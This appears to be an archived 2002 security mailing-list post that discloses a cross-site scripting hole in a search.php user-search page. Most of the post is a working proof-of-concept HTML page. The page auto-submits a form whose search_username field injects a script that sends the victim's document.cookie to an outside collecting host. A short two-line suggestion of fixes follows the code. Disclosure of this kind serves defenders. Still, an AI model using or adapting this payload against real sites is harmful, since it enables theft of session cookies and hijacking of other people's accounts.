OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Fabricio Angeletti (f_a_a_at_yahoo.com)
Date: Tue Dec 03 2002 - 14:09:00 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Hello :)

    here is the code
    ----------------
    <html>
    <body>
    <form method="post" name="search"
    action="http://target/search.php?mode=searchuser">
    <input type="hidden" name="search_username" value=""/>

    </form>
    <SCRIPT>
    search.search_username.value='http://savecookie/x.php?Cookie="><script>location=search.search_username.value+document.cookie;</script\>';
    document.search.submit();
    </script>
    </body>
    </html>
    ------------
    work for me using, IE 6 sp 1 (xp)

    maybe you can do this in a better way but, this
    example work realy fine

    the problem is search.php when show search_username u
    can put anything with a few restrictions

    solution:
    1 Don't show the last entry or something like that
    2 filter the code :p

    Bye

    _________________________________________________________
    Do You Yahoo!?
    Información de Estados Unidos y América Latina, en Yahoo! Noticias.
    Visítanos en http://noticias.espanol.yahoo.com